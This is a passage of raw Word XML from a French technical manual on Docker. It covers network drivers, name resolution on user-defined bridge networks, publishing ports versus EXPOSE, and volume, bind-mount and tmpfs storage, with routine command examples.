            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hôte unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui, sur un réseau créé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Hôte unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Non (réseau de l'hôte)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>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2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolation totale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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overlay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Multi-hôtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Swarm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>macvlan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau physique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Selon le réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IP dans le LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes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Créer un réseau dédié</w:t>
        <w:br/>
        <w:t>docker network create --driver bridge app-net</w:t>
        <w:br/>
        <w:t>docker network inspect app-net</w:t>
        <w:br/>
        <w:br/>
        <w:t># Connecter deux conteneurs</w:t>
        <w:br/>
        <w:t>docker run -d --name db  --network app-net postgres:16-alpine</w:t>
        <w:br/>
        <w:t>docker run -d --name api --network app-net -p 8080:3000 mon-api:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Depuis api, la base est joignable par son nom</w:t>
        <w:br/>
        <w:t>docker exec api getent hosts db</w:t>
        <w:br/>
        <w:t># 172.20.0.2      db</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RÉSOLUTION PAR NOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Sur un réseau défini par l'utilisateur, Docker fournit un DNS interne : le nom du conteneur (ou son alias réseau) résout vers son adresse. C'est la base du service discovery local.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier la connectivité</w:t>
        <w:br/>
        <w:t>docker exec api sh -c "wget -qO- http://db:5432 || true"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Adresse IP d'un conteneur</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  db</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne pas dépendre de l'IP : utiliser le nom</w:t>
        <w:br/>
        <w:t># Sur le réseau bridge par défaut, la résolution par nom ne fonctionne pas</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LE RÉSEAU `BRIDGE` PAR DÉFAUT NE RÉSOUT PAS LES NOMS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> explicite, un conteneur obtient une adresse mais ne peut pas joindre un autre conteneur par son nom. Créez toujours un réseau dédié : c'est une ligne, et cela résout le problème.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>64.2 Exposer, publier, exposer entre conteneurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois notions sont souvent confondues : publier un port vers l'hôte, exposer un port aux autres conteneurs du réseau, et écouter sur une interface donnée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.231 — Quatre notions de port</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Notion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Syntaxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-p 8080:80</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Hôte, éventuellement toutes les interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Publication locale</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-p 127.0.0.1:8080:80</w:t>
            </w:r>
          </w:p>
        </w:tc>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Hôte uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exposition documentaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>EXPOSE 80</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Aucun effet réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Accès entre conteneurs</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Nom + port interne</w:t>
            </w:r>
          </w:p>
        </w:tc>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Réseau Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois exemples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Publier uniquement sur l'interface locale</w:t>
        <w:br/>
        <w:t>docker run -d -p 127.0.0.1:5432:5432 --name db postgres:16-alpine</w:t>
        <w:br/>
        <w:br/>
        <w:t># Publier sur toutes les interfaces (attention aux pare-feux)</w:t>
        <w:br/>
        <w:t>docker run -d -p 0.0.0.0:8080:80 nginx:1.27-alpine</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ouvrir un shell sans exposer de port</w:t>
        <w:br/>
        <w:t>docker exec -it api sh</w:t>
      </w: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PUBLIER SEULEMENT CE QUI DOIT L'ÊTRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une base de données n'a aucune raison de publier un port sur l'hôte : les autres conteneurs la joignent par le réseau Docker. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-p 5432:5432</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0.0.0.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> expose la base à tout le réseau.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>64.3 Volumes, bind mounts et tmpfs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur est éphémère : supprimer le conteneur supprime sa couche d'écriture. Pour conserver des données, il faut un espace extérieur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.232 — Trois types de montage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199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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Emplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Géré par</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1990"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Volume nommé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2927"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/var/lib/docker/volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2341"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données persistantes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1990"/>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Bind mount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Chemin de l'hôte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Vous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Développement, configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1990"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>tmpfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2927"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Noyau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2341"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
